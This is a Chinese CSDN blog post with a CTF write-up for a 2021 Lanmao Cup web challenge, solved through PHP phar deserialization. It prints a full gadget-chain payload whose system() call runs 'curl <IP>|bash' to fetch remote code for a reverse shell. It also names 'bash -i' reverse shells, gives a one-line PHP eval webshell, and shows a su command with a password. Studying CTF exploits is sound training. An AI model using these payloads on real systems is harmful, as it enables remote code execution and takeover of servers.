[蓝帽杯]2021 不一样的web

已于 2022-09-05 12:12:47 修改
阅读量992 收藏 1
点赞数 1
文章标签: php web安全 安全
于 2022-09-05 12:12:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/126702425
版权
本文探讨了一段PHP代码中通过Phar文件和反序列化技巧,成功绕过错误提示,执行系统命令的过程,包括利用`system`函数进行shell反弹,并展示了如何构造payload和利用不同的攻击手段。作者还介绍了如何通过监听端口接收并执行恶意代码,最终获取flag的过程。
摘要由CSDN通过智能技术生成

前置知识:

来看这样一段代码:

<?php
Class Mode{
	function hello(){
		echo "hello,yes";
	}
}


$a=array(Mode,hello);
$a();

会得到什么回显呢?

尽管会警告,但是还是执行了结果,所以我们可以通过数组配合()来调用类中的方法

解题

进入页面:

上传文件+查询文件:phar警告

打开F12,发现有提示:

可以利用查询文件这里看一下有没有phar协议,先构造一下Phar序列化的包得到lib.php的源码

<?php
class Read{
    public $name;
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
		$func = $this->f;
        $func();
    }
}
$a = new Test(array(Read,file_get));

$phar = new Phar('phar.phar');
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar->setMetadata($a);
$phar->addFromString('1.txt','dky'); // phar:[phar.phar][system_get_you_filename]/1.txt

访问该文件后生成的phar.phar改名为:phar.gif

上传后提示了路径,那么就用phar协议读取一下:

phar://4623e4e6/4b3cf1ffc9224f4d830c5a29db854d15/1b33718042e7dfe8fac079be96ebc4d9.gif/1.txt

得到回显,这里建议使用burp传包,比较明显:

解码后:

<?php
error_reporting(0);
class Modifier{
	public $old_id;
	public $new_id;
	public $p_id;
	public function __construct(){
		$this->old_id = "1";
		$this->new_id = "0";
		$this->p_id = "1";
	}
	public function __get($value){
		$new_id = $value;
		$this->old_id = random_bytes(16);
		if($this->old_id===$this->new_id){
			system($this->p_id);
		}
	}
}
class Read{
    public function file_get()
    {
        $text = base64_encode(file_get_contents("lib.php"));
        echo $text;
    }

}
class Files{
	public $filename;
	public function __construct($filename){
		$this->filename = $this->FilesWaf($filename);
	}
	public function __wakeup(){
		$this->FilesWaf($this->filename);
	}
	public function __toString(){
		return $this->filename;
	}
	public function __destruct(){
		echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
		
	}
	public function FilesWaf($name){
		if(stristr($name, "/")!==False){
			return "index.php";
		}
		return $name;
	}
}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
		$func = $this->f;
        $func();
    }
}
class User{
	public $name;
	public $profile;
	public function __construct($name){
		$this->name = $this->UserWaf($name);
		$this->profile = "I am admin.";
	}
	public function __wakeup(){
		$this->UserWaf($this->name);
	}
	public function __toString(){
		return $this->profile->name;
	}
	public function __destruct(){
		echo "Hello ".$this->UserWaf($this->name).".</br>";
		
	}
	public function UserWaf($name){
		if(strlen($name)>10){
			return "admin";
		}
		if(!preg_match("/[a-f0-9]/iu",$name)){
			return "admin";
		}
		return $name;
	}
}

又是构造反序列化链了,很明显要利用system函数:很简单的链子我就直接上payload了

<?php
error_reporting(0);
class Modifier{
	public $old_id;
	public $new_id;
	public $p_id;
	public function __construct(){
		$this->old_id = "1";
		$this->new_id = &$this->old_id;
		$this->p_id = "curl 47.107.232.51|bash"; // 多种选择
	}
	public function __get($value){
		$new_id = $value;
		$this->old_id = random_bytes(16);
		if($this->old_id===$this->new_id){
			system($this->p_id);
		}
	}
}
class Files{
	public $filename;
	public function __construct($filename){
		$this->filename = $this->FilesWaf($filename);
	}
	public function __wakeup(){
		$this->FilesWaf($this->filename);
	}
	public function __toString(){
		return $this->filename;
	}
	public function __destruct(){
		echo "Your file is ".$this->FilesWaf($this->filename).".</br>";
		
	}
	public function FilesWaf($name){
		if(stristr($name, "/")!==False){
			return "index.php";
		}
		return $name;
	}
}
class Test{
    public $f;
    public function __construct($value){
        $this->f = $value;
    }

    public function __wakeup()
    {
		$func = $this->f;
        $func();
    }
}
class User{
	public $name;
	public $profile;
	public function __construct($name){
		$this->name = $this->UserWaf($name);
		$this->profile = "I am admin.";
	}
	public function __wakeup(){
		$this->UserWaf($this->name);
	}
	public function __toString(){
		return $this->profile->name;
	}
	public function __destruct(){
		echo "Hello ".$this->UserWaf($this->name).".</br>";
		
	}
	public function UserWaf($name){
		if(strlen($name)>10){
			return "admin";
		}
		if(!preg_match("/[a-f0-9]/iu",$name)){
			return "admin";
		}
		return $name;
	}
}
$a = new Files();
$a->filename=new User();
$a->filename->profile=new Modifier();

$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString('test.txt','test');
$phar->setMetadata($a);
$phar->stopBuffering();

那个system函数那里有几种选择,我说我已经知道的:

1.利用curl反弹shell

2.利用bash -i 反弹shelll(和1的原理差不多)

3.直接写马(echo "<?php eval($_POST[8]);?>">shell.php)

我这里直接用第一种了。

先公网启用一个监听端口:

同样使用phar协议打进去:

之后成功反弹shell:

接下来就是拿flag了,但是根目录没有flag,起初的思路是用命令:

find / -name "flag"来

发现一个/home/flag,但是权限不够,以为要提权

后来看了wp发现,是根目录还有一个game,可以拿到flag账户的登陆密码,使用flag账户来拿flag。由于直接cat game太乱,于是写一个shell连接一下蚁剑:

之后再登陆flag账户,拿flag

也可以不登录,用su的来执行账户命令

echo "90a3f46888b32b4b1b104208957be421" | su - flag -c 'ls /home/flag'

提示flag的名字为这个,直接cat f*解决:

清风--
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[Python从零到壹] 五十.图像增强及运算篇之图像直方图理论知识和绘制实现
杨秀璋的专栏
08-10 3727
欢迎大家来到“Python从零到壹”,在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍。第二部分将讲解图像运算和图像增强,上一篇文章介绍介绍顶帽运算和底帽运算。这篇文章将进入新的系列,讲解图像直方图理论知识和绘制方法,本文将从OpenCV和Matplotlib两个方面介绍如何绘制直方图,这将为图像处理像素对比提供有效支撑。希望文章对您有所帮助,如果有不足之处,还请海涵。...
2023 蓝帽杯初赛web&部分取证复现
weixin_63231007的博客
09-18 891
蓝帽杯初赛web file()侧信道攻击&内存取证、apk取证、手机取证
不同Web技术
zeeeitch
05-27 96
        ------------------
不同的时代,不同的Web
凯凯王的技术生涯
04-06 350
整体架构  服务端向客户端和CMS提供接口,CMS面对管理员的客户端CMS的两个功能:1 基础数据的增删改查,比如添加商品,删除商品类目2 特殊操作,比如我们要实现的发送微信消息三端分离 强调一下CMS也是一个客户端,不要和服务端放一起项目特点通用、适合互联网公司的、又良好结构的产品三端分离基于REST API基于Token令牌管理权限  登陆判断系统权限及分权,作用域一套架构适配IOS、Andr...
一道不一样的web,用到了御剑、字典、爆破来解
mafucan的博客
07-19 2658
先看hint,形为fl111ag.php的答案,明显为 接在 之后的隐藏网页 这里两个思路 ①.使用御剑和字典进行页面扫描 先去生成对应的字典,生成完后 先取出这里面的配置文件,将我们的字典改为对应的PHP.txt加进去 扫描出结果即可 ②爆破 加入字典 start attack 找不同,看response ...
Ruby/Rails: 不一样的'Web'应用(续)
Step Third
07-28 116
上一篇文章([url]http://www.iteye.com/topic/219826[/url])发出之后,很多人表示对这个案例很感兴趣,要求我再深入地谈谈。应大家之邀, 我对上一篇内容进行一些补充,谈谈如何在一个传统的嵌入式领域项目中为了拥抱变化而引入web技术,以及用定制的rails框架解决非web应用问题,最后简要地谈谈一般性应用的思考。 在上一篇中,我轻描淡写地描述了由于客户对W...
Ruby/Rails──不一样的"Web"应用
InfoQ中文站官方博客
09-10 633
前些日子,Ricky Zheng以“rubynroll”的id在JavaEye上发表过两篇博客,名为“Ruby/Rails:不一样的‘web’应用”和“Ruby/Rails:不一样的‘web’应用”(续)”。他以一个农场自动化系统为示例,探讨了如何在一个传统的嵌入式领域项目中为了拥抱变化而引入web技术,研究如何定制以Rails为基础的领域特定的MVC框架。InfoQ中文站有幸邀请到作者,对这
红蓝攻防对抗中需要掌握的网络安全技术汇总
maoguan121的博客
10-13 1852
SafeSEH,(Safe Structured exception handling)是 Windows操作系统的一种安全机 制,专门用于防止异常处理函数被篡改,即在程序调用异常处理函数之前,对要调用的异常 处理函数进行一系列的有效性校验,如果发现异常处理函数不可靠或存在安全风险,则应立 即终止异常处理函数的调用。反之,如果 SafeSEH机制设计不完善或存在缺欠,就有可能被 攻击者利用,欺骗或绕过。
HTML5期末大作业:电影网站设计——电影动漫言叶之庭(4页) web前端课程设计_web前端课程设计代码,web课程设计-HTML网页制作代码
11-08 1406
HTML5期末大作业:电影网站设计——电影动漫言叶之庭(4页) web前端课程设计_web前端课程设计代码,web课程设计-HTML网页制作代码 常见网页设计作业题材有 个人、 美食、 公司、 学校、 旅游、 电商、 宠物、 电器、 茶叶、 家居、 酒店、 舞蹈、 动漫、 明星、 服装、 体育、 化妆品、 物流、 环保、 书籍、 婚纱、 军事、 游戏、 节日、 戒烟、 电影、 摄影、 文化、 家乡、 鲜花、 礼品、 汽车、 其他 等网页设计题目, A+水平作业, 可满足大学生网页大作业网页设计需求, 喜欢
带有 OpenCV.js 的 ESP32-CAM Web 服务器:颜色识别和跟踪
no_id12138的博客
08-04 875
蓝帽杯2021初赛 writeup+赛后复现(misc123+pwn2+web1)
mumuzi的博客
04-30 5347
蓝帽越来越离谱 争分夺秒,101分排到前70 Ball_sigin + slient + 冬奥会_is_coming + 复现I_will_but_not_quite + 嫌疑人x的硬盘整理(未完全复现) 1.web:Ball_sigin 纯玩游戏,会出现3个单词缺一个字母,分别吃到对应字母即可出flag 2.PWN:slient 既然是原题,就可以直接算杂项了吧(雾 直接参考这个:https://www.lintstar.top/2020/12/784edd2e的slient,改掉端口和ip即可,fla
三种不同的Web开发方法
kdmhh的专栏
10-25 686
三种不同模式下的开发技术:传统的javascript模式、基于框架的不刷新模式、基于Ajax的Web2.0模式。三种模式的比较:3种刷新技术都比较快,如果数据量大,最慢的是“Iframe”,因为其属于完全的服务器端技术,会不断与服务器进行交互,从而影响Web也的整体响应能力。速度最快的应该是“javascript脚本方法”,因为其采用全客户端技术,不需要在运行过程中与服
不一样的webService 简单实例
冷小风的博客
06-18 418
webService 的简单实例。大家看一下webService它是如何实现的吧!
『CTF Web复现』BUUCTF-[蓝帽杯 2021]One Pointer PHP
Ho1aAs‘s Blog
09-01 1813
利用点: serialize反序列化 数组索引整型溢出 bypass open_basedir FPM/FastCGI bypass disable_functions反弹shell suid提权
蓝帽杯wp
qq_51425032的博客
05-12 603
冬奥会is coming 首先打开附件是一个吉祥物图片,用Binwalk分离出一个压缩包,解压压缩包可以得到一个音频,是一个冬奥宣传歌曲。拿去audacity分析没有什么东西,除了前面一段乱码,放winhex看,发现cipher后面接一串奇怪的编码,是十六进制的,hex解密后发现是emoji,用emoji-aes: https://aghorler.github.io/emoji-aes/ 但是解密需要密钥,尝试了加密,发现不使用{}时少了几种表情,所以猜测这里解密出来直接就是flag。对mp3文件进行
2022蓝帽杯初赛wp
mumuzi的博客
07-10 5424
2022蓝帽初赛
2022 第六届蓝帽杯初赛 WP By 知行网安
xczzhf的博客
07-11 1377
第六届蓝帽杯wp
web flag.php,2020 WMCTF Web Writeup
weixin_30247833的博客
03-19 487
前言周末打了下WMCTF,Web题量大且大多需要细致推敲,以下是部分Web题解。web_checkin签到题不多说了,似乎是出题的时候,忘记改flag名了……直接包含即可:http://web_checkin.wmctf.wetolink.com/?content=/flagno_body_knows_php_better_than_me题目如下:highlight_file(__FILE__);...
2022蓝帽杯wp
hez__的博客
07-10 621
蓝帽杯 2022 wp
2023蓝帽杯初赛misc下载
最新发布
12-04
2023蓝帽杯初赛misc下载是指在2023年举办的蓝帽杯网络安全竞赛中的一项miscellaneous(杂项)类题目的下载。在初赛中,参赛选手需要下载与miscellaneous相关的题目文件或资源,并进行分析和解决。 首先,参赛选手...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值